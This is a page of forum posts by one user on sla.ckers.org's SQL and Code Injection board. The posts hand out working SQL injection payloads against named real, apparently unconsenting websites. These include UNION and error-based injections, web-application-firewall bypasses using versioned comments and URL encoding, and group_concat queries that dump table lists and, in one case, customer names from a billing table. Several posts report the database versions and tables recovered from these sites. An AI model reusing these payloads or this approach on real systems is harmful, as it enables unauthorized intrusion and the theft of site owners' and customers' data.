Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 43
15 days ago
ajkaro
@JokeJones you are probably joking. hex('table_name') will give you text "table_name" in hex and not real table name from database...
Forum: SQL and Code Injection
16 days ago
ajkaro
Sorry, I thought you need syntax for union select (I didn't test your sintax if it works or not). In information_schema.tables WAF protects . (period). Replace it with URL encoded value %2e like: and 1=2 union select 1,2,3,version,5,count(*) from information_schema%2etables-- - There are 131 tables in primary database: _pro_type cn_about_job cn_about_jobform cn_about_lxwm cn_about_lx
Forum: SQL and Code Injection
17 days ago
ajkaro
use and 0 UNioN(SeLECt(1),2,3,version(),5,version())-- - version: 5.1.48-log
Forum: SQL and Code Injection
7 months ago
ajkaro
Use this post post data: login=1&action=logue_in&code=abc') or 1 GROUP BY concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -&mdp=pass Version: 5.5.18-log
Forum: SQL and Code Injection
8 months ago
ajkaro
Hy Net_Spy version: 5.0.37-standard-debug-log sent to PM Regards
Forum: SQL and Code Injection
11 months ago
ajkaro
>>man look https://www.nivatel.com/static.php?id=9+order/**/by/**/1--+--+ --+ is used to comment out remaining part (what ever is after it...). So you can't count next --+ If you want to test for max. 20 characters put extra characters BEFORE --+ Other site: http://www.precisionaerobatics.com/gallery_det.php?gid=2' and 0 %55Nion %53eLect 1,version(),3,4,5,6,7,8%23 No stop as
Forum: SQL and Code Injection
11 months ago
ajkaro
Hi firestorm I answered him on HF (same question)... And you answered him for nivatel.com site :) So OP is well served ;)
Forum: SQL and Code Injection
11 months ago
ajkaro
When there is no data in some column and you are concatenating data from that column to some other column data remember: CONCAT() returns NULL if any of those data is NULL !!!!
Forum: SQL and Code Injection
11 months ago
ajkaro
Dear firestorm do you mind to elaborate :)
Forum: SQL and Code Injection
11 months ago
ajkaro
Here you go: hXXp://wXw.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,concat (0x3c2f7469746c653e, (/*!50000SeLeCt*/(@) from(/*!50000SeLeCt*/(@:=0x00) ,(/*!50000SeLeCt*/(@) from(x_billing)where(@) in (@:=concat (@,0x0a,first_name,0x3a,last_name,0x3c62723e))))a),0x3c7469746c653e),4,5,6,7,8,9,10,11,12 -- - Number of records with phone is 0 !!! hXXp://wXw.atpcb.co
Forum: SQL and Code Injection
11 months ago
ajkaro
@hack2012 Why displaying one table in a time with limit if you can show all 6 tables at once: hXXp://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!50000UNION*/ SELECT 1,2,/*!50000GrouP_Concat(table_name, 0x3c62723e)*/,4,5,6 from /*!50000information_schema*/.tables where table_schema=database()-- -
Forum: SQL and Code Injection
11 months ago
ajkaro
@hack2012 your tip is wrong. Function concat() is for concatenating few arguments. Like concat(version(), 'ajkaro') As you are not concatenating anything to table_name (your code: concat(table_name)) function concat() isn't doing anything in you case, so you can delete it. You need group_concat function if you want to see all tables at once and not only ONE table as in your case. B
Forum: SQL and Code Injection
11 months ago
ajkaro
#1 string based SQLi (21 columns) - version: 5.5.33-31.1 hXXp://wXw.laptopmela.com/productDetails.php?id=1279' group by 21%23 #2 string absed SQLi (14 columns) - version: 5.1.72-log hXXp://wXw.baliwestimports.com/product-detail.php?id=119' group by 14-- - #3 use some other link - version: 5.0.92 hXXp://wXw.muttluks.com/page.php?pid=30 #4 injection in title tag - version: 5.1.69
Forum: SQL and Code Injection
11 months ago
ajkaro
WAF is protecting group_concat. Use: hXXp://wXw.universalpartymusic.com/productDetails.php?id=288 and 0 /*!50000UNION*/ SELECT 1,version(),3,4,5,/*!50000Group_Concat(table_name,0x3c62723e)*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from /*!50000information_schema*/.tables where table_schema=database()%23
Forum: SQL and Code Injection
11 months ago
ajkaro
WAF is protecting group_concat function. use hXXp://wXw.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,/*!50000Group_Concat(table_name,0x3c62723e)*/,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,version(),49,50,51,52,53,54,55,56 from /*!50000information_schema*/.tables whe
Forum: SQL and Code Injection
11 months ago
ajkaro
it is html modification done by SQLi so data are not hidden in web page source, but showed in web page... 1) <title>your SQL injection</title> to see injection result on web page instead of in title part of web page (see html code of web page) 2) sam here: I modified some HTML tags to see injection result on web page </li></ul> is 0x3c2f6c693e3c2f756c3e in HEX
Forum: SQL and Code Injection
11 months ago
ajkaro
hXXp://wXw.hearingisbelieving.co.uk/accessories.php?accCat=2 search web for some MSAccess SQLi tutorial (I hate doing Micro$oft SQL injection) hXXp://wXw.shoplocalstores.ca/productdetail.php?pid=62' and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat('</title>',version()),17,18,19,20,21,22,23,24,25,26,27 -- -&id=45 hXXp://wXw.cleanic.com.hk/EN/productDetail.php?id=434&
Forum: SQL and Code Injection
11 months ago
ajkaro
use some other link hXXp://wXw.siliconeintakes.com/details.php?products_id=311 and 0 /*!Union*/ SeLect 1,2,3,4,5,6,7,8,9,10,11%23&osCsid=29ce12437ab50af372d405dab021e3d1
Forum: SQL and Code Injection
11 months ago
ajkaro
use /*!50000UnIoN*/ /*!50000SeLeCt*/ second link: there are 13 columns :)
Forum: SQL and Code Injection
11 months ago
ajkaro
use lowercase table names :)
Forum: SQL and Code Injection
1 year ago
ajkaro
You should bypass WAF http://www.terraceslife.it/shop.php?cat=3 +or+1+group+by+concat_ws(0x7e,(select+table_name+from+informa%54ion_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))+having+min(0)-- Duplicate entry 'config~1' for key 1
Forum: SQL and Code Injection
1 year ago
ajkaro
I am not interested in your money. I just don't believe in your story...
Forum: SQL and Code Injection
1 year ago
ajkaro
Nice story but I don't believe you. How can you pay from firm's account? Isn't there any control and payment authorisation from somebody? On the other hand you payed somebody else and now you are expecting other will test site for you for free. Nice logic. You social ingeneering strategy didn't work for me... Good luck next time :)
Forum: SQL and Code Injection
1 year ago
ajkaro
No need to double nullify original select statement with negative id parameter AND false statement and 3=2 Use one or other. Not both... Without knowing your link nobody can tell you what is wrong. You could anticipate that... :)
Forum: SQL and Code Injection
1 year ago
ajkaro
I told you union select doesn't work. Use error based SQL injection.
Forum: SQL and Code Injection
1 year ago
ajkaro
You can use error based... It seems union select based doesn't work. version: 5.0.77 tables (15): - ajankohtaista - intraoikeudet - intraryhmat ... ... Use URL encoding for WAF bypass
Forum: SQL and Code Injection
1 year ago
ajkaro
1. yes it is. Read my tutorial http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/ 2. if using "dump in one shot" syntax (see tutorial above) that is not needed any more 3. by adding: where table_name>'aaa'
Forum: SQL and Code Injection
1 year ago
ajkaro
There are 49 tables but you can't see them all because group_concat has 1024 chars limit. To skip tables from information schema (CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS...) add: +from+information_schema.tables where table_schema=database()--
Forum: SQL and Code Injection
1 year ago
ajkaro
You can't just use @@version. Where is union select part? It is string based injection, only one column, vulnerable column is hidden in <a href> tag in source code so you must make it visible first. version: 5.0.91-log
Forum: SQL and Code Injection
1 year ago
ajkaro
Use /*!50000union*/ /*!50000select*/ There are 3 columns, vulnerable is column #3 hidden in <img> tag version: 5.5.23-55
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2